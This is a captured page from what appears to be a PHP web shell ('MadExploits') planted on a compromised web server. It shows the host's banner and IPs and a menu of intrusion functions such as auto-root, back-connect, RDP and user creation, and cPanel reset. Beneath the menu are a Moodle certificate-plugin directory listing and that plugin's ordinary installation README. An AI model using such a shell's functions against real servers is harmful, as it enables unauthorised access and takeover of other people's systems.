Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.59.197
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
simplecertificate /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
322
B
-rw-r--r--
.travis.yml
1.9
KB
-rw-r--r--
README.md
2.94
KB
-rw-r--r--
composer.json
209
B
-rw-r--r--
externallib.php
2.31
KB
-rw-r--r--
index.php
4.01
KB
-rw-r--r--
lib.php
15.6
KB
-rw-r--r--
locallib.php
96.59
KB
-rw-r--r--
mod_form.php
18.64
KB
-rw-r--r--
report.php
1.81
KB
-rw-r--r--
settings.php
3.68
KB
-rw-r--r--
verify.php
3.77
KB
-rw-r--r--
verify_form.php
2.54
KB
-rw-r--r--
version.php
1.49
KB
-rw-r--r--
view.php
3.92
KB
-rw-r--r--
wmsendfile.php
6.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
* [](https://travis-ci.org/bozoh/moodle-mod_simplecertificate) - Moodle 3.8 * [](https://github.com/bozoh/moodle-mod_simplecertificate) ## CLONE This version of the plugin contains a 'completion_event' branch, on which there is the ability to email the certificate as an attachment automatically upon course completion event. ## ATTENTION --- **It's NOT RECOMMENDED to install version below 2.2.6 (MOODLE_31), due a security issues (#178 and #179)**, but if you choose to install it, apply the patch. I think this patch can be safely applied in any version above 2.2.0 (MOODLE_25), and to do this first download the patch file: https://gist.github.com/bozoh/a282badf56ffa7da0c4f1ec3d85a0af7/archive/ff385cda11e155167abf0ccb9e9127cc0427b48e.zip Unzip it and copy bug-178-179.patch file to <YOUR MOODLE FOLDER>/mod/simplecertificate Run this command in simplecertificate folder ``` patch < bug-178-179.patch ``` patch command it's part of most linux version and flavors # QUICK INSTALL --- There are two installation methods that are available. Follow one of these, then log into your Moodle site as an administrator and visit the notifications page to complete the install. ## MOST RECOMMENDED METHOD - Git --- If you do not have git installed, please see the below link. Please note, it is not necessary to set up the SSH Keys. This is only needed if you are going to create a repository of your own on github.com. Information on installing git - http://help.github.com/set-up-git-redirect/ Once you have git installed, simply visit the Moodle mod directory and clone git://github.com/bozoh/moodle-mod_simplecertificate.git, remember to rename the folder to certificate if you do not specify this in the clone command Eg. Linux command line would be as follow - git clone git://github.com/bozoh/moodle-mod_simplecertificate.git simplecertificate Once cloned, checkout the branch that is specific to your Moodle version. eg, MOODLE_22 is for Moodle 2.2, MOODLE_23 is for 2.3 Use git pull to update this branch periodically to ensure you have the latest version. ## Download the simplecertificate module. Visit https://github.com/bozoh/moodle-mod_simplecertificate, choose the branch that matches your Moodle version (eg. MOODLE_22 is for Moodle 2.2, MOODLE_23 is for 2.3) and download the zip, uncompress this zip and extract the folder. The folder will have a name similar to bozoh-moodle-mod_simplecertificate-c9fbadb, you MUST rename this to simplecertificate. Place this folder in your mod folder in your Moodle directory. > The reason this is not the recommended method is due to the fact you have to over-write the contents of this folder to apply any future updates to the simplecertificate module. In the above method there is a simple command to update the files.
Close